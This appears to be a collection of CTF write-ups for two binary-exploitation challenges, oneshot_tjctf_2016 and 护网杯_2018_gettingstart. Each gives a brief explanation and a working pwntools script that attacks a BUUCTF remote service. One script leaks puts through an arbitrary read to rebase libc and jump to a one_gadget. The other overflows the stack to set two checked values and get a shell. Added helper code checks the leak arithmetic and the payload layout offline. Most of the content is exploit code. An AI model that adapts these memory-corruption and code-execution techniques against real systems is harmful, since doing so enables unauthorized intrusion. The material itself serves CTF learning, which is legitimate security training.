oneshot_tjctf_2016:
Not much to say: the binary reads whatever address you give it (leak puts's runtime address to get the libc base) and then jumps wherever you tell it, so point the jump at a one_gadget.
exp:
from pwn import *

context.log_level = 'debug'
p = remote("node4.buuoj.cn", 25942)
e = ELF("./111")
libc = ELF("./libc-2.23.so")

# Arbitrary read: the address is taken in decimal. 6294232 == 0x600ad8 holds
# puts's runtime address, which gives the libc base.
p.recvuntil(b"Read location?")
p.sendline(b"6294232")
p.recvuntil(b"Value: ")
addr = int(p.recv(18), 16)   # "0x" + 16 zero-padded hex digits
success(hex(addr))
base = addr - libc.sym['puts']

# one_gadget offsets for libc-2.23: 0x45226 0x4527a 0xf03a4 0xf1247 on one build,
# 0x45216 (used here) on another. They differ between builds of the same
# version, so regenerate them with one_gadget against the libc the service ships.
one_gadget = base + 0x45216

# Arbitrary jump: the target is also taken in decimal.
p.recvuntil(b"Jump location?")
p.sendline(str(one_gadget).encode())
p.interactive()
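Added example, not part of the original writeup: the leak-to-target arithmetic from the exp above, pulled out so it can be checked offline. The sample "Value:" line and the puts offset 0x6f690 are constructed for this example (the real offset comes from `readelf -s libc.so.6 | grep ' puts'`); the one_gadget offset is the one the exp uses. The sanity check rejects a base that is not page-aligned, which is the usual sign of a leak against the wrong symbol or libc build and is worth catching before you jump.

```python
import re

# Offset of the one_gadget used in the exp above (libc-2.23, build-specific).
ONE_GADGET_OFFSET = 0x45216

LEAK_RE = re.compile(rb"Value: (0x[0-9a-fA-F]{1,16})")


def parse_leak(line: bytes) -> int:
    """Pull the leaked 64-bit value out of the 'Value: 0x...' line."""
    m = LEAK_RE.search(line)
    if m is None:
        raise ValueError("no leak in %r" % (line,))
    return int(m.group(1), 16)


def base_is_sane(base: int) -> bool:
    """libc is mmap'd page-aligned inside the 47-bit user address space.
    A base that fails this means the wrong symbol, the wrong libc build
    or a garbled read; stop rather than jump to garbage."""
    return 0 < base < (1 << 47) and (base & 0xFFF) == 0


def libc_base(leaked_puts: int, puts_offset: int) -> int:
    """Rebase: runtime address of puts minus its offset in the libc file."""
    base = leaked_puts - puts_offset
    if not base_is_sane(base):
        raise ValueError("implausible libc base 0x%x" % base)
    return base


def jump_target(leak_line: bytes, puts_offset: int,
                gadget_offset: int = ONE_GADGET_OFFSET) -> int:
    """Absolute address of the one_gadget for this run."""
    return libc_base(parse_leak(leak_line), puts_offset) + gadget_offset


def as_decimal(addr: int) -> bytes:
    """Both prompts parse a decimal number, so send digits, not hex or raw bytes."""
    return str(addr).encode()


# Constructed sample: a 'Value:' line as the service prints it, and an assumed
# puts offset (0x6f690). Replace both with what your target actually gives.
SAMPLE_LINE = b"Value: 0x00007ffff7a7c690\n"
SAMPLE_PUTS_OFFSET = 0x6F690

if __name__ == "__main__":
    base = libc_base(parse_leak(SAMPLE_LINE), SAMPLE_PUTS_OFFSET)
    target = jump_target(SAMPLE_LINE, SAMPLE_PUTS_OFFSET)
    print("libc base", hex(base), "jump to", hex(target), as_decimal(target))
```

With the sample values the base comes out as 0x7ffff7a0d000 and the jump target as 0x7ffff7a52216; a leak that is off by even one byte fails `base_is_sane` instead of producing a plausible-looking but wrong target.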
护网杯_2018_gettingstart:
Overwrite the two checked stack variables with the values the binary expects and it gives you a shell.
exp:
from pwn import *

context.log_level = 'debug'
p = remote("node4.buuoj.cn", 27047)
p.recvuntil(b"But Whether it starts depends on you.")

# 0x18 bytes of padding reach the two checked variables: an unsigned long that
# must equal 0x7fffffffffffffff, then a double that must equal 0.1
# (0x3FB999999999999A is the IEEE 754 bit pattern of 0.1).
pl1 = b'a' * 0x18 + p64(0x7fffffffffffffff) + p64(0x3FB999999999999A)
p.send(pl1)
p.interactive()
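Added example, not part of the original writeup: where the magic constant in the payload comes from, and a way to check the frame layout offline before sending it. `struct.pack("<d", 0.1)` produces exactly the eight bytes that `p64(0x3FB999999999999A)` does, so the double can be written from the literal instead of a looked-up hex value. The padding of 0x18 and the two expected values are taken from the exp above; `what_the_check_sees` is this example's own model of how the binary reinterprets the bytes after the padding, not code from the challenge.

```python
import struct

EXPECTED_U64 = 0x7FFFFFFFFFFFFFFF   # first checked variable (unsigned long)
EXPECTED_DOUBLE = 0.1               # second checked variable (double)
PADDING = 0x18                      # bytes from the input buffer to the first variable, as in the exp


def double_bits(x: float) -> int:
    """IEEE 754 binary64 bit pattern of x as an integer (little-endian pack)."""
    return struct.unpack("<Q", struct.pack("<d", x))[0]


def bits_to_double(bits: int) -> float:
    """Inverse of double_bits: reinterpret 8 bytes as a double."""
    return struct.unpack("<d", struct.pack("<Q", bits))[0]


def build_payload(pad: int = PADDING, u64: int = EXPECTED_U64,
                  dbl: float = EXPECTED_DOUBLE) -> bytes:
    """Padding, then the two variables laid out as the stack holds them:
    little-endian, 8 bytes each, integer first."""
    return b"a" * pad + struct.pack("<Qd", u64, dbl)


def what_the_check_sees(payload: bytes, pad: int = PADDING):
    """Model of the binary's view: skip the padding, then read an unsigned
    long followed by a double from the overwritten stack slots."""
    return struct.unpack_from("<Qd", payload, pad)


def passes_check(payload: bytes, pad: int = PADDING) -> bool:
    """True only if both slots hold exactly the expected values. The double
    compare is exact, so the bit pattern has to be the one 0.1 produces."""
    v1, v2 = what_the_check_sees(payload, pad)
    return v1 == EXPECTED_U64 and v2 == EXPECTED_DOUBLE


if __name__ == "__main__":
    print(hex(double_bits(0.1)))            # the constant used in the exp
    print(passes_check(build_payload()))    # the exp's layout
    # padding off by one shifts both slots and the compare fails
    print(passes_check(build_payload(pad=0x17) + b"\n"))
```

Run it before touching the remote: if the padding guess is wrong, `passes_check` says so locally, which is cheaper than staring at a closed connection.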